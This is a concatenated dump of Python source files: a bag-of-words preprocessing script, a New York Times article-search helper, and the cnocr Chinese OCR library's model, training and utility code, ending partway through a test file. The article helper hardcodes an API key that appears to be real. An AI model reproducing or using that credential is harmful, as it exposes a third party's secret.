# itemIdList : the list of distinct terms in the document
# itemCountList : the list of number of the existence of corresponding terms
class Document:
    """One document in bag-of-words form.

    Attributes:
        itemIdList: ids of the distinct terms occurring in the document.
        itemCountList: occurrence count aligned with itemIdList.
        wordCount: total number of words (with repetition).
    """

    def __init__(self, itemIdList, itemCountList, wordCount):
        self.itemIdList = itemIdList
        self.itemCountList = itemCountList
        self.wordCount = wordCount
# Preprocessing - filter out stopwords, handle segmentation, and use the class Document to represent all documents in the text sample.
def preprocessing():
    """Tokenize sample.txt into pseudo-documents and build the vocabulary.

    Returns (docs, word2id, id2word):
        docs    -- list of Document objects (bag-of-words per pseudo-doc)
        word2id -- term -> integer id, in discovery order
        id2word -- integer id -> term (inverse of word2id)
    Reads 'stopwords.dic' and 'sample.txt' from the working directory.
    """
    # read in all stopwords to be filtered out.
    file = codecs.open('stopwords.dic','r','utf-8')
    stopwords = [line.strip() for line in file]
    #print(stopwords)
    file.close()
    # the document to read and produce topics from
    with open('sample.txt','r') as fh:
        all_lines = fh.readlines()
    str_all_lines = ' '.join(all_lines).replace('\n','')
    raw_documents = split_into_sentences(str_all_lines)
    # Check that sentence splitting has worked.
    # print(raw_documents)
    # Group 4 sentences as a document.
    # NOTE(review): the `< len(raw_documents)-4` bound drops the last few
    # sentences of the input; confirm whether the tail should be kept.
    documents = []
    i=0
    while i < len(raw_documents)-4:
        documents.append(raw_documents[i]+'\n'+raw_documents[i+1]+raw_documents[i+2]+'\n'+raw_documents[i+3]+'\n')
        i+=4
    docs = []
    word2id = {}
    id2word = {}
    currentWordId = 0
    for document in documents:
        #word2Count is a dictionary, essentially a hashmap with the number of occurrences of each word in a sentence.
        word2Count = {}
        # Create generator objects for each word in the string, cuts on whole words and punctuation.
        segList = jieba.cut(document)
        for word in segList:
            word = word.lower().strip()
            # Get rid of items that are punctuation, numbers, or stopwords.
            if len(word) > 1 and not re.search('[0-9]', word) and word not in stopwords:
                if word not in word2id:
                    word2id[word] = currentWordId
                    id2word[currentWordId] = word
                    currentWordId += 1
                if word in word2Count:
                    word2Count[word] += 1
                else:
                    word2Count[word] = 1
        # Flatten the per-document counts into the parallel-list form
        # that Document expects.
        itemIdList = []
        itemCountList = []
        wordCount = 0
        for word in word2Count.keys():
            itemIdList.append(word2id[word])
            itemCountList.append(word2Count[word])
            wordCount += word2Count[word]
        docs.append(Document(itemIdList, itemCountList, wordCount))
    return docs, word2id, id2word
def maxItemNum(N, docs):
    """Return the largest number of distinct terms among the first *N* docs.

    Parameters
    ----------
    N : int
        How many leading documents of *docs* to consider.
    docs : sequence
        Objects exposing an ``itemIdList`` sequence attribute.

    Returns
    -------
    int
        The maximum ``len(doc.itemIdList)``, or 0 when ``N`` is 0.
    """
    # max() with default=0 replaces the manual running-maximum loop and
    # makes the empty-corpus case explicit instead of implicit.
    return max((len(docs[d].itemIdList) for d in range(N)), default=0)
--- FILE SEPARATOR ---
# Dependencies
import requests
import time
from pprint import pprint
def retrieve_articles(query):
    """Search the NYT article-search API for *query*.

    Prints and returns a numbered summary string, one "N. snippet url"
    line per matching article. Performs up to 4 GET requests (one per
    result page) with a one-second pause between them.
    """
    url = "https://api.nytimes.com/svc/search/v2/articlesearch.json?"
    # SECURITY NOTE(review): API key committed in source; move it to an
    # environment variable and revoke the exposed key.
    api_key = "db1Vnm2AtlDDvNGJwu5izccRSafP0DGl"
    # Search for articles published between a begin and end date
    begin_date = "20190101"
    end_date = "20190818"
    # Built once; the original rebuilt this identical URL inside the loop.
    base_query_url = f"{url}api-key={api_key}&q={query}&begin_date={begin_date}&end_date={end_date}"
    # Collected "snippet url" strings
    articles_list = []
    # Articles mentioning any of these terms are irrelevant and skipped.
    ignore_terms = ["marriage", "wedding", "pregnancy", 'adventure']
    # loop through pages for more results.
    for page in range(0, 4):
        # create query with page number
        query_url = f"{base_query_url}&page={str(page)}"
        articles = requests.get(query_url).json()
        # Add a one second interval between queries to stay within API query limits
        time.sleep(1)
        for article in articles["response"]["docs"]:
            entry = f'{article["snippet"]} {article["web_url"]}'
            # BUG FIX: the original appended first and then called pop()
            # once per *matching* ignore term, so an entry containing two
            # ignore terms also removed an unrelated earlier entry.
            # Append only when no ignore term matches instead.
            if not any(term in entry for term in ignore_terms):
                articles_list.append(entry)
    string_articles_list = ''
    for index, entry in enumerate(articles_list):
        print(f'{index+1}. {entry} \n')
        string_articles_list += f'{index+1}. {entry} \n'
    return string_articles_list

'''
# Retrieve articles
articles = requests.get(query_url).json()
articles_list = [article for article in articles["response"]["docs"]]
#print(articles_list)
for article in articles_list:
    print(f'{article["snippet"]} {article["web_url"]} \n')
'''
|
[
"/keyword_extractor.py",
"/news_api.py",
"/preprocessing.py",
"/retrieve_articles.py"
] |
0000005/kiftd-source
|
from .cn_ocr import CnOcr
--- FILE SEPARATOR ---
# coding: utf-8
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import os
import mxnet as mx
import numpy as np
from PIL import Image
from cnocr.__version__ import __version__
from cnocr.consts import MODEL_EPOCE
from cnocr.hyperparams.cn_hyperparams import CnHyperparams as Hyperparams
from cnocr.fit.lstm import init_states
from cnocr.fit.ctc_metrics import CtcMetrics
from cnocr.data_utils.data_iter import SimpleBatch
from cnocr.symbols.crnn import crnn_lstm
from cnocr.utils import data_dir, get_model_file, read_charset, normalize_img_array
from cnocr.line_split import line_split
def read_ocr_img(path):
    """Read the file at *path* as a single-channel gray image.

    :param path: image file path
    :return: gray image, with dim [height, width, 1], with values range from 0 to 255
    """
    # flag=0 asks mxnet for grayscale decoding.
    gray_img = mx.image.imread(path, 0)
    return gray_img
def rescale_img(img, hp):
    """
    :param img: np.ndarray or mx.ndarray; should be gray image, with dim [height, width] or [height, width, 1]
    :param hp: instance of Hyperparams
    :return: np.ndarray with the given width and height from hp. The resulting dim is [1, height, width]
    """
    if isinstance(img, np.ndarray):
        img = mx.nd.array(img)
    # Preserve aspect ratio: scale width by the same factor that maps the
    # image height onto hp.img_height.
    scale = hp.img_height / img.shape[0]
    new_width = int(scale * img.shape[1])
    # Side effect: updates the hyperparams' sequence length to match the
    # rescaled width (8 presumably mirrors the network's width-compression
    # factor — TODO confirm against hp.seq_len_cmpr_ratio).
    hp._seq_length = new_width // 8
    if len(img.shape) == 2:  # mx.image.imresize needs the third dim
        img = mx.nd.expand_dims(img, 2)
    img = mx.image.imresize(img, w=new_width, h=hp.img_height).asnumpy()
    # Drop the channel axis, then add the leading axis: [1, height, width].
    img = np.squeeze(img, axis=2)
    return np.expand_dims(img, 0)
def lstm_init_states(batch_size, hp):
    """ Returns a tuple of names and zero arrays for LSTM init states"""
    shapes = init_states(
        batch_size=batch_size,
        num_lstm_layer=hp.num_lstm_layer,
        num_hidden=hp.num_hidden,
    )
    # init_states yields (name, shape) pairs; materialize zeros per shape.
    names = [name for name, _ in shapes]
    arrays = [mx.nd.zeros(shape) for _, shape in shapes]
    return names, arrays
def load_module(prefix, epoch, data_names, data_shapes, network=None):
    """
    Loads the model from checkpoint specified by prefix and epoch, binds it
    to an executor, and sets its parameters and returns a mx.mod.Module
    """
    sym, arg_params, aux_params = mx.model.load_checkpoint(prefix, epoch)
    # A freshly-built network (if given) replaces the checkpointed symbol;
    # only the saved parameters are reused.
    if network is not None:
        sym = network
    # We don't need CTC loss for prediction, just a simple softmax will suffice.
    # We get the output of the layer just before the loss layer ('pred_fc') and add softmax on top
    pred_fc = sym.get_internals()['pred_fc_output']
    sym = mx.sym.softmax(data=pred_fc)
    # CPU-only inference module; no labels needed at prediction time.
    mod = mx.mod.Module(symbol=sym, context=mx.cpu(), data_names=data_names, label_names=None)
    mod.bind(for_training=False, data_shapes=data_shapes)
    mod.set_params(arg_params, aux_params, allow_missing=False)
    return mod
class CnOcr(object):
    """Chinese OCR front end.

    Downloads/loads a pretrained CRNN-LSTM checkpoint on construction and
    exposes page-level (``ocr``) and line-level (``ocr_for_single_line``,
    ``ocr_for_single_lines``) recognition methods.
    """

    MODEL_FILE_PREFIX = 'model-v{}'.format(__version__)

    def __init__(self, root=data_dir(), model_epoch=MODEL_EPOCE):
        # NOTE(review): root=data_dir() is evaluated once at class-definition
        # time, so later changes to $CNOCR_HOME do not affect the default.
        self._model_dir = os.path.join(root, 'models')
        self._model_epoch = model_epoch
        self._assert_and_prepare_model_files(root)
        self._alphabet, _ = read_charset(os.path.join(self._model_dir, 'label_cn.txt'))
        self._hp = Hyperparams()
        self._hp._loss_type = None  # infer mode
        self._mod = self._get_module(self._hp)

    def _assert_and_prepare_model_files(self, root):
        # Ensure the charset, params, and symbol files exist locally;
        # otherwise (re)download the whole model archive.
        model_dir = self._model_dir
        model_files = ['label_cn.txt',
                       '%s-%04d.params' % (self.MODEL_FILE_PREFIX, self._model_epoch),
                       '%s-symbol.json' % self.MODEL_FILE_PREFIX]
        file_prepared = True
        for f in model_files:
            f = os.path.join(model_dir, f)
            if not os.path.exists(f):
                file_prepared = False
                break
        if file_prepared:
            return
        # NOTE(review): os.removedirs only removes *empty* directories, so a
        # partially-populated model_dir would raise OSError here — confirm.
        if os.path.exists(model_dir):
            os.removedirs(model_dir)
        get_model_file(root)

    def _get_module(self, hp):
        # Build the CRNN graph and bind it with the downloaded weights.
        network = crnn_lstm(hp)
        prefix = os.path.join(self._model_dir, self.MODEL_FILE_PREFIX)
        # import pdb; pdb.set_trace()
        data_names = ['data']
        data_shapes = [(data_names[0], (hp.batch_size, 1, hp.img_height, hp.img_width))]
        mod = load_module(prefix, self._model_epoch, data_names, data_shapes, network=network)
        return mod

    def ocr(self, img_fp):
        """
        :param img_fp: image file path; or color image mx.nd.NDArray or np.ndarray,
            with shape (height, width, 3), and the channels should be RGB formatted.
        :return: List(List(Char)), such as:
            [['第', '一', '行'], ['第', '二', '行'], ['第', '三', '行']]
        """
        if isinstance(img_fp, str) and os.path.isfile(img_fp):
            img = mx.image.imread(img_fp, 1).asnumpy()
        elif isinstance(img_fp, mx.nd.NDArray):
            img = img_fp.asnumpy()
        elif isinstance(img_fp, np.ndarray):
            img = img_fp
        else:
            raise TypeError('Inappropriate argument type.')
        # NOTE(review): degenerate images return '' (a str), although the
        # docstring promises a list — callers should be aware.
        if min(img.shape[0], img.shape[1]) < 2:
            return ''
        # Split the page into single-line images, then recognize each line.
        line_imgs = line_split(img, blank=True)
        line_img_list = [line_img for line_img, _ in line_imgs]
        line_chars_list = self.ocr_for_single_lines(line_img_list)
        return line_chars_list

    def ocr_for_single_line(self, img_fp):
        """
        Recognize characters from an image with only one-line characters.
        :param img_fp: image file path; or image mx.nd.NDArray or np.ndarray,
            with shape [height, width] or [height, width, channel].
            The optional channel should be 1 (gray image) or 3 (color image).
        :return: character list, such as ['你', '好']
        """
        if isinstance(img_fp, str) and os.path.isfile(img_fp):
            img = read_ocr_img(img_fp)
        elif isinstance(img_fp, mx.nd.NDArray) or isinstance(img_fp, np.ndarray):
            img = img_fp
        else:
            raise TypeError('Inappropriate argument type.')
        # Delegate to the batch path with a single-element batch.
        res = self.ocr_for_single_lines([img])
        return res[0]

    def ocr_for_single_lines(self, img_list):
        """
        Batch recognize characters from a list of one-line-characters images.
        :param img_list: list of images, in which each element should be a line image array,
            with type mx.nd.NDArray or np.ndarray.
            Each element should be a tensor with values ranging from 0 to 255,
            and with shape [height, width] or [height, width, channel].
            The optional channel should be 1 (gray image) or 3 (color image).
        :return: list of list of chars, such as
            [['第', '一', '行'], ['第', '二', '行'], ['第', '三', '行']]
        """
        if len(img_list) == 0:
            return []
        img_list = [self._preprocess_img_array(img) for img in img_list]
        batch_size = len(img_list)
        # Right-pad every line image to the widest one in the batch.
        img_list, img_widths = self._pad_arrays(img_list)
        # import pdb; pdb.set_trace()
        sample = SimpleBatch(
            data_names=['data'],
            data=[mx.nd.array(img_list)])
        prob = self._predict(sample)
        prob = np.reshape(prob, (-1, batch_size, prob.shape[1]))  # [seq_len, batch_size, num_classes]
        max_width = max(img_widths)
        res = []
        for i in range(batch_size):
            res.append(self._gen_line_pred_chars(prob[:, i, :], img_widths[i], max_width))
        return res

    def _preprocess_img_array(self, img):
        """
        :param img: image array with type mx.nd.NDArray or np.ndarray,
            with shape [height, width] or [height, width, channel].
            channel shoule be 1 (gray image) or 3 (color image).
        :return: np.ndarray, with shape (1, height, width)
        """
        if len(img.shape) == 3 and img.shape[2] == 3:
            if isinstance(img, mx.nd.NDArray):
                img = img.asnumpy()
            if img.dtype != np.dtype('uint8'):
                img = img.astype('uint8')
            # color to gray
            img = np.array(Image.fromarray(img).convert('L'))
        img = rescale_img(img, self._hp)
        return normalize_img_array(img)

    def _pad_arrays(self, img_list):
        """Padding to make sure all the elements have the same width."""
        img_widths = [img.shape[2] for img in img_list]
        if len(img_list) <= 1:
            return img_list, img_widths
        max_width = max(img_widths)
        pad_width = [(0, 0), (0, 0), (0, 0)]
        padded_img_list = []
        for img in img_list:
            if img.shape[2] < max_width:
                # Right-pad the width axis with zeros up to max_width.
                pad_width[2] = (0, max_width - img.shape[2])
                img = np.pad(img, pad_width, 'constant', constant_values=0.0)
            padded_img_list.append(img)
        return padded_img_list, img_widths

    def _predict(self, sample):
        # Forward pass only; the module was bound with for_training=False.
        mod = self._mod
        mod.forward(sample)
        prob = mod.get_outputs()[0].asnumpy()
        return prob

    def _gen_line_pred_chars(self, line_prob, img_width, max_img_width):
        """
        Get the predicted characters.
        :param line_prob: with shape of [seq_length, num_classes]
        :param img_width:
        :param max_img_width:
        :return:
        """
        class_ids = np.argmax(line_prob, axis=-1)
        # idxs = list(zip(range(len(class_ids)), class_ids))
        # probs = [line_prob[e[0], e[1]] for e in idxs]
        if img_width < max_img_width:
            # Positions beyond this line's true width come from padding;
            # force them to class 0 (the reserved CTC separator).
            comp_ratio = self._hp.seq_len_cmpr_ratio
            end_idx = img_width // comp_ratio
            if end_idx < len(class_ids):
                class_ids[end_idx:] = 0
        prediction, start_end_idx = CtcMetrics.ctc_label(class_ids.tolist())
        # print(start_end_idx)
        alphabet = self._alphabet
        res = [alphabet[p] for p in prediction]
        # res = self._insert_space_char(res, start_end_idx)
        return res

    def _insert_space_char(self, pred_chars, start_end_idx, min_interval=None):
        # Insert ' ' between characters separated by a large horizontal gap.
        # Currently unused (see the commented-out call in _gen_line_pred_chars).
        if len(pred_chars) < 2:
            return pred_chars
        assert len(pred_chars) == len(start_end_idx)
        if min_interval is None:
            # Automatically derive the minimal gap threshold from the
            # observed gaps between consecutive characters.
            intervals = {start_end_idx[idx][0] - start_end_idx[idx-1][1] for idx in range(1, len(start_end_idx))}
            if len(intervals) >= 3:
                intervals = sorted(list(intervals))
                if intervals[0] < 1:  # drop the zero-gap case
                    intervals = intervals[1:]
                # NOTE(review): if the zero gap was just dropped from a
                # 3-element set, intervals[2] can raise IndexError — confirm.
                min_interval = intervals[2]
            else:
                min_interval = start_end_idx[-1][1]  # no space will be inserted
        res_chars = [pred_chars[0]]
        for idx in range(1, len(pred_chars)):
            if start_end_idx[idx][0] - start_end_idx[idx-1][1] >= min_interval:
                res_chars.append(' ')
            res_chars.append(pred_chars[idx])
        return res_chars
--- FILE SEPARATOR ---
from .__version__ import __version__
# Remote archive holding the pretrained model files (Dropbox direct download).
MODEL_BASE_URL = 'https://www.dropbox.com/s/7w8l3mk4pvkt34w/cnocr-models-v1.0.0.zip?dl=1'
# Epoch number of the released checkpoint ("EPOCE" is a historical misspelling
# kept because other modules import it by this name).
MODEL_EPOCE = 20
# Local file name used for the downloaded model archive.
ZIP_FILE_NAME = 'cnocr-models-v{}.zip'.format(__version__)
--- FILE SEPARATOR ---
import logging
import os
import mxnet as mx
def _load_model(args):
if 'load_epoch' not in args or args.load_epoch is None:
return None, None, None
assert args.prefix is not None
model_prefix = args.prefix
sym, arg_params, aux_params = mx.model.load_checkpoint(
model_prefix, args.load_epoch)
logging.info('Loaded model %s-%04d.params', model_prefix, args.load_epoch)
return sym, arg_params, aux_params
def fit(network, data_train, data_val, metrics, args, hp, data_names=None):
    """Bind *network* into an mxnet Module and train it.

    Resumes from the checkpoint named by args.prefix/args.load_epoch when
    given, and checkpoints every epoch back to args.prefix.
    """
    # Prefer GPUs when requested; otherwise spread over args.cpu CPU contexts.
    if args.gpu:
        contexts = [mx.context.gpu(i) for i in range(args.gpu)]
    else:
        contexts = [mx.context.cpu(i) for i in range(args.cpu)]
    sym, arg_params, aux_params = _load_model(args)
    if sym is not None:
        # A resumed checkpoint must describe the same graph we just built.
        assert sym.tojson() == network.tojson()
    if not os.path.exists(os.path.dirname(args.prefix)):
        os.makedirs(os.path.dirname(args.prefix))
    module = mx.mod.Module(
        symbol=network,
        data_names=["data"] if data_names is None else data_names,
        label_names=['label'],
        context=contexts)
    # from mxnet import nd
    # import numpy as np
    # data = nd.random.uniform(shape=(128, 1, 32, 100))
    # label = np.random.randint(1, 11, size=(128, 4))
    # module.bind(data_shapes=[('data', (128, 1, 32, 100))], label_shapes=[('label', (128, 4))])
    # # e = module.bind()
    # # f = e.forward(is_train=False)
    # module.init_params(mx.init.Xavier(factor_type="in", magnitude=2.34))
    # from ..data_utils.data_iter import SimpleBatch
    # data_all = [data]
    # label_all = [mx.nd.array(label)]
    # # print(label_all[0])
    # # data_names = ['data'] + init_state_names
    # data_names = ['data']
    # label_names = ['label']
    #
    # data_batch = SimpleBatch(data_names, data_all, label_names, label_all)
    # module.forward(data_batch)
    # f = module.get_outputs()
    # import pdb; pdb.set_trace()
    begin_epoch = args.load_epoch if args.load_epoch else 0
    num_epoch = hp.num_epoch + begin_epoch
    module.fit(train_data=data_train,
               eval_data=data_val,
               begin_epoch=begin_epoch,
               num_epoch=num_epoch,
               # use metrics.accuracy or metrics.accuracy_lcs
               eval_metric=mx.metric.np(metrics.accuracy, allow_extra_outputs=True),
               optimizer='AdaDelta',
               optimizer_params={'learning_rate': hp.learning_rate,
                                 # 'momentum': hp.momentum,
                                 'wd': 0.00001,
                                 },
               initializer=mx.init.Xavier(factor_type="in", magnitude=2.34),
               arg_params=arg_params,
               aux_params=aux_params,
               batch_end_callback=mx.callback.Speedometer(hp.batch_size, 50),
               epoch_end_callback=mx.callback.do_checkpoint(args.prefix),
               )
--- FILE SEPARATOR ---
# coding: utf-8
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import os
import platform
import zipfile
import numpy as np
from mxnet.gluon.utils import download
from .consts import MODEL_BASE_URL, ZIP_FILE_NAME
def data_dir_default():
    """
    :return: default data directory depending on the platform and environment variables
    """
    # Windows keeps app data under %APPDATA%\cnocr; all other systems
    # use a hidden ~/.cnocr directory.
    if platform.system() == 'Windows':
        return os.path.join(os.environ.get('APPDATA'), 'cnocr')
    return os.path.join(os.path.expanduser("~"), '.cnocr')
def data_dir():
    """
    :return: data directory in the filesystem for storage, for example when downloading models
    """
    # The CNOCR_HOME environment variable overrides the per-platform default.
    return os.environ.get('CNOCR_HOME', data_dir_default())
def get_model_file(root=data_dir()):
    r"""Return location for the downloaded models on local file system.

    This function will download from online model zoo when model cannot be found or has mismatch.
    The root directory will be created if it doesn't exist.

    Parameters
    ----------
    root : str, default $CNOCR_HOME
        Location for keeping the model parameters.

    Returns
    -------
    file_path
        Path to the requested pretrained model file.
    """
    root = os.path.expanduser(root)
    os.makedirs(root, exist_ok=True)
    zip_file_path = os.path.join(root, ZIP_FILE_NAME)
    # Download only when the archive is not already present locally.
    if not os.path.exists(zip_file_path):
        download(MODEL_BASE_URL, path=zip_file_path, overwrite=True)
    # Unpack into root, then delete the archive to save space.
    with zipfile.ZipFile(zip_file_path) as zf:
        zf.extractall(root)
    os.remove(zip_file_path)
    return os.path.join(root, 'models')
def read_charset(charset_fp):
    """Load the label charset file.

    Returns (alphabet, inv_alph_dict): a list mapping class id -> character,
    and the inverse character -> class id dict. Index 0 is a reserved slot
    used by CTC to separate characters and maps to no real character.
    """
    alphabet = [None]
    with open(charset_fp, encoding='utf-8') as fp:
        alphabet.extend(line.rstrip('\n') for line in fp)
    # print('Alphabet size: %d' % len(alphabet))
    inv_alph_dict = {char: idx for idx, char in enumerate(alphabet)}
    # inv_alph_dict[' '] = inv_alph_dict['<space>']  # would map the space char
    return alphabet, inv_alph_dict
def normalize_img_array(img):
    """ rescale to [-1.0, 1.0] """
    # Standardize to roughly zero mean / unit variance; the epsilon guards
    # against division by zero on constant images.
    centered = img - np.mean(img)
    return centered / (np.std(img) + 1e-6)
--- FILE SEPARATOR ---
# coding: utf-8
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import print_function
import argparse
import logging
import os
import sys
sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
from cnocr.__version__ import __version__
from cnocr.utils import data_dir
from cnocr.hyperparams.cn_hyperparams import CnHyperparams as Hyperparams
from cnocr.hyperparams.hyperparams2 import Hyperparams as Hyperparams2
from cnocr.data_utils.data_iter import ImageIterLstm, MPOcrImages, OCRIter
from cnocr.symbols.crnn import crnn_no_lstm, crnn_lstm
from cnocr.fit.ctc_metrics import CtcMetrics
from cnocr.fit.fit import fit
def parse_args():
    """Parse command line arguments for training: dataset choice, data
    paths, device counts, checkpointing, and loss options."""
    parser = argparse.ArgumentParser()
    default_model_prefix = os.path.join(data_dir(), 'models', 'model-v{}'.format(__version__))
    parser.add_argument("--dataset",
                        help="use which kind of dataset, captcha or cn_ocr",
                        choices=['captcha', 'cn_ocr'],
                        type=str, default='captcha')
    # NOTE(review): the three path defaults below point at a developer's
    # local filesystem; they must be overridden on other machines.
    parser.add_argument("--data_root", help="Path to image files", type=str,
                        default='/Users/king/Documents/WhatIHaveDone/Test/text_renderer/output/wechat_simulator')
    parser.add_argument("--train_file", help="Path to train txt file", type=str,
                        default='/Users/king/Documents/WhatIHaveDone/Test/text_renderer/output/wechat_simulator/train.txt')
    parser.add_argument("--test_file", help="Path to test txt file", type=str,
                        default='/Users/king/Documents/WhatIHaveDone/Test/text_renderer/output/wechat_simulator/test.txt')
    parser.add_argument("--cpu",
                        help="Number of CPUs for training [Default 8]. Ignored if --gpu is specified.",
                        type=int, default=2)
    parser.add_argument("--gpu", help="Number of GPUs for training [Default 0]", type=int)
    parser.add_argument('--load_epoch', type=int,
                        help='load the model on an epoch using the model-load-prefix [Default: no trained model will be loaded]')
    parser.add_argument("--prefix", help="Checkpoint prefix [Default '{}']".format(default_model_prefix),
                        default=default_model_prefix)
    parser.add_argument("--loss", help="'ctc' or 'warpctc' loss [Default 'ctc']", default='ctc')
    parser.add_argument("--num_proc", help="Number CAPTCHA generating processes [Default 4]", type=int, default=4)
    parser.add_argument("--font_path", help="Path to ttf font file or directory containing ttf files")
    return parser.parse_args()
def get_fonts(path):
    """Collect font file paths.

    If *path* is a directory, every .ttf/.ttc file directly inside it is
    returned; otherwise *path* itself is returned as a one-element list.
    """
    if not os.path.isdir(path):
        return [path]
    return [
        os.path.join(path, name)
        for name in os.listdir(path)
        if name.endswith(('.ttf', '.ttc'))
    ]
def run_captcha(args):
    """Train the CRNN-LSTM on synthetically generated digit captchas."""
    from cnocr.data_utils.captcha_generator import MPDigitCaptcha

    hp = Hyperparams2()
    network = crnn_lstm(hp)
    # arg_shape, out_shape, aux_shape = network.infer_shape(data=(128, 1, 32, 100), label=(128, 10),
    # l0_init_h=(128, 100), l1_init_h=(128, 100), l2_init_h=(128, 100), l3_init_h=(128, 100))
    # print(dict(zip(network.list_arguments(), arg_shape)))
    # import pdb; pdb.set_trace()
    # Start a multiprocessor captcha image generator
    # NOTE(review): h=hp.img_width, w=hp.img_height — the keyword names look
    # swapped relative to the values; confirm against MPDigitCaptcha's signature.
    mp_captcha = MPDigitCaptcha(
        font_paths=get_fonts(args.font_path), h=hp.img_width, w=hp.img_height,
        num_digit_min=3, num_digit_max=4, num_processes=args.num_proc, max_queue_size=hp.batch_size * 2)
    mp_captcha.start()
    # img, num = mp_captcha.get()
    # print(img.shape, num)
    # import numpy as np
    # import cv2
    # img = np.transpose(img, (1, 0))
    # cv2.imwrite('captcha1.png', img * 255)
    # import sys
    # sys.exit(0)
    # import pdb; pdb.set_trace()
    # init_c = [('l%d_init_c' % l, (hp.batch_size, hp.num_hidden)) for l in range(hp.num_lstm_layer * 2)]
    # init_h = [('l%d_init_h' % l, (hp.batch_size, hp.num_hidden)) for l in range(hp.num_lstm_layer * 2)]
    # init_states = init_c + init_h
    # data_names = ['data'] + [x[0] for x in init_states]
    data_names = ['data']
    # Both iterators draw from the same captcha generator queue.
    data_train = OCRIter(
        hp.train_epoch_size // hp.batch_size, hp.batch_size, captcha=mp_captcha, num_label=hp.num_label,
        name='train')
    data_val = OCRIter(
        hp.eval_epoch_size // hp.batch_size, hp.batch_size, captcha=mp_captcha, num_label=hp.num_label,
        name='val')
    head = '%(asctime)-15s %(message)s'
    logging.basicConfig(level=logging.DEBUG, format=head)
    metrics = CtcMetrics(hp.seq_length)
    fit(network=network, data_train=data_train, data_val=data_val, metrics=metrics, args=args, hp=hp, data_names=data_names)
    # Shut the generator processes down once training completes.
    mp_captcha.reset()
def run_cn_ocr(args):
    """Train the CRNN-LSTM on real OCR line images listed in train/test files."""
    hp = Hyperparams()
    network = crnn_lstm(hp)
    # Multiprocess feeders keep training fed; the test feeder gets fewer
    # processes and a smaller queue.
    mp_data_train = MPOcrImages(args.data_root, args.train_file, (hp.img_width, hp.img_height), hp.num_label,
                                num_processes=args.num_proc, max_queue_size=hp.batch_size * 100)
    # img, num = mp_data_train.get()
    # print(img.shape)
    # print(mp_data_train.shape)
    # import pdb; pdb.set_trace()
    # import numpy as np
    # import cv2
    # img = np.transpose(img, (1, 0))
    # cv2.imwrite('captcha1.png', img * 255)
    # import pdb; pdb.set_trace()
    mp_data_test = MPOcrImages(args.data_root, args.test_file, (hp.img_width, hp.img_height), hp.num_label,
                               num_processes=max(args.num_proc // 2, 1), max_queue_size=hp.batch_size * 10)
    mp_data_train.start()
    mp_data_test.start()
    # init_c = [('l%d_init_c' % l, (hp.batch_size, hp.num_hidden)) for l in range(hp.num_lstm_layer * 2)]
    # init_h = [('l%d_init_h' % l, (hp.batch_size, hp.num_hidden)) for l in range(hp.num_lstm_layer * 2)]
    # init_states = init_c + init_h
    # data_names = ['data'] + [x[0] for x in init_states]
    data_names = ['data']
    data_train = OCRIter(
        hp.train_epoch_size // hp.batch_size, hp.batch_size, captcha=mp_data_train, num_label=hp.num_label,
        name='train')
    data_val = OCRIter(
        hp.eval_epoch_size // hp.batch_size, hp.batch_size, captcha=mp_data_test, num_label=hp.num_label,
        name='val')
    # data_train = ImageIterLstm(
    #     args.data_root, args.train_file, hp.batch_size, (hp.img_width, hp.img_height), hp.num_label, init_states, name="train")
    # data_val = ImageIterLstm(
    #     args.data_root, args.test_file, hp.batch_size, (hp.img_width, hp.img_height), hp.num_label, init_states, name="val")
    head = '%(asctime)-15s %(message)s'
    logging.basicConfig(level=logging.DEBUG, format=head)
    metrics = CtcMetrics(hp.seq_length)
    fit(network=network, data_train=data_train, data_val=data_val, metrics=metrics, args=args, hp=hp, data_names=data_names)
    # Shut the feeder processes down once training completes.
    mp_data_train.reset()
    mp_data_test.reset()
if __name__ == '__main__':
    args = parse_args()
    # Dispatch on the requested dataset type.
    if args.dataset == 'captcha':
        run_captcha(args)
    else:
        run_cn_ocr(args)
--- FILE SEPARATOR ---
# coding: utf-8
import os
import sys
import pytest
import numpy as np
import mxnet as mx
from mxnet import nd
from PIL import Image
sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
sys.path.insert(1, os.path.dirname(os.path.abspath(__file__)))
from cnocr import CnOcr
from cnocr.line_split import line_split
# Shared OCR instance, constructed once at import time (this downloads/loads
# the pretrained model), so all tests reuse the same loaded network.
CNOCR = CnOcr()
# Each case: (image file name under examples/, expected per-line char lists).
SINGLE_LINE_CASES = [
    ('20457890_2399557098.jpg', [['就', '会', '哈', '哈', '大', '笑', '。', '3', '.', '0']]),
    ('rand_cn1.png', [['笠', '淡', '嘿', '骅', '谧', '鼎', '臭', '姚', '歼', '蠢', '驼', '耳', '裔', '挝', '涯', '狗', '蒽', '子', '犷']])
]
MULTIPLE_LINE_CASES = [
    ('multi-line_cn1.png', [['网', '络', '支', '付', '并', '无', '本', '质', '的', '区', '别', ',', '因', '为'],
                            ['每', '一', '个', '手', '机', '号', '码', '和', '邮', '件', '地', '址', '背', '后'],
